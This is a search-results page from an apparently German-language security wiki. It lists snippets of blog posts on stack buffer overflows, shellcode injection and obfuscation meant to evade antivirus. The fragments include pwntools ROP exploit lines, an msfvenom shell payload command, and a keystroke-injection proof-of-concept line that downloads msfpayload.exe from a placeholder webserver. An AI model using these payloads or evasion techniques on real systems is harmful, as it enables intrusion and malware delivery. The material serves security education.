Suche
Unten sind die Ergebnisse Ihrer Suche gelistet.
Volltextergebnisse:
- Buffer overflow in the 64-bit stack - Part 3 @en:it-security:blog
- h>psycore8/nosoc-bof/tree/main/part-3|Github]]. <file c bof-part3.c> /* Code https://blog.techorganic.c... setbuf(stdout, 0); vuln(); return 0; } </file> \\ \\ ===== Debug ===== {{page>en:vorlagen:att... s write a first exploit to ''write()'' to leak. <file python buf3-stage1.py> #!/usr/bin/env python fro... # POP Argumente buf += p64(constants.STDOUT_FILENO) # stdout buf += p64(bin.got[b'write'])
- Shellcode Injection Part 1 @en:it-security:blog
- cesses and some techniques for obfuscating binary files. In the first part, we look at how to inject she... es it as a threat. You can find all the required files in the [[en:it-security:blog:shellcode_injection... should be in C format | | > shell.c | Save to the file shell.c | <code bash> msfvenom -p windows/shell_... tes. We take this from the ''msfvenom'' output. <file cpp local-process-injection.cpp> #include <stdio.
- Shellcode Injection Part 3 @en:it-security:blog
- ow how we can use a shellcode injection to load a file via HTTP and then execute it. \\ \\ ===== Code =... assembly === The code executes a downloaded VBS file. However, we want to start a Python script that c... tylus> ;Zeile 143 / +7 marks the beginning of the filename (WindowsAgent.py) lea edx, [esi + 7] ;Zeile... reate the shellcode as ''%%x86 Windows%%'' binary file. We do this with ''%%nasm%%'': <code bash> nasm
- Buffer overflow in the 64-bit stack - Part 2 @en:it-security:blog
- per and display the gadgets <code bash> ropper --file bof-part2 ... 0x000000000040116a: pop rdi; ret; .... ll need 2 offsets for the exploit. So we load our file into the debugger and start it: <code bash> gdb-... === Now we run our Python exploit and create the file in.txt. <code bash>python2 buffer.py</code> \\ \\ ==== Set authorisations ==== Our file still needs the appropriate root permissions. <c
- Obfuscation: Disguise shellcode as UUIDs @en:it-security:blog
- something like this: <code cpp> [*] try to open file [+] reading 240906.001 successful! [*] try to gen... the victim system. After the copying process, the file is not recognised. We scan it once manually with ... ooks good. ==== Execute ==== We now execute the file and wait for the result. Unfortunately, nothing ... ==== The UUID obfuscation works and protects the file when accessing the hard drive. After execution, m
- Helpful NMAP scanner commands
- aceroute -O: Enable OS detection -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, ... and Grepable format, respectively, to the given filename. -iL <inputfilename>: Input from list of hosts/networks </code> ==== Scan host services ==== <cod
- Buffer overflow in the 64-bit stack - part 1 @en:it-security:blog
- The Shellcode((http://shell-storm.org/shellcode/files/shellcode-77.html)) is stored in an environment ... ==== First we set root rights to the vulnerable file and start it((https://blog.techorganic.com/2015/0... bof-dism-5.png?600|root Shell!}}] \\ \\ ^ Project files | {{ it-security:nosoc-repo-bof64.zip |}}<label
- Obfuscation: polymorphic in-memory decoder @en:it-security:blog
- ep: - We extract the actual shellcode from the file ''%%calc.o%%'' and save it in ''%%calc.raw%%'' (f... ur code and prepare it for our ''%%Inject.cpp%%'' file: <code python> python shencode.py formatout -i x... xor-decoder.stub -fb 60 -lb 329 [*] try to open file [+] reading xor-decoder.o successful! [*] cutting
- Shellcode Injection Part 2 @en:it-security:blog
- , this alone was not enough, so that the compiled file was recognised directly. Nevertheless, I also use... ated by the ''%%function_encoder.py%%'' generated file ''%%output.bin%%''. \\ \\ ==== Obfy ==== Jigsaw ... s Defender could no longer recognise the compiled file. I didn't even have to do much. It was enough to
- Shellcode Injection Part 4 @en:it-security:blog
- ode> <callout type="info" icon="true"> Opens the file ''windir\syswow64\kernel32.dll'' in PEView. This ... > Then it is worth taking a look at the compiled file: <code> objdump -d calc-unsanitized.o </code> {... .o -s c </code> The command provides us with the file in C format syntax. We know that our shellcode st
- The importance of awareness in IT security @en:it-security:blog
- romised. The trigger was a double-click on an ISO file that was sent as an attachment in an email. Windo... k methods === In this particular example, an ISO file was included. This is only symbolic for the time
- Host Discovery with Metasploit database
- bases 'msf' and 'msf_test' Creating configuration file in /usr/share/metasploit-framework/config/databas
- Secure passwords
- r be written down - Storing passwords in a text file on your computer is also not secure - Sticking
- FatCat Attack PoC @en:it-security:blog
- ttps://<DEIN-COOLER-WEBSERVER>/msfpayload.exe -OutFile msfpayload.exe DELAY 3000 ENTER DELAY 5000 STRING
- Obfuscation: ByteSwapping @en:it-security:blog
- ode> * Then we extract it and save it in a new file <code python> python shencode.py formatout -i po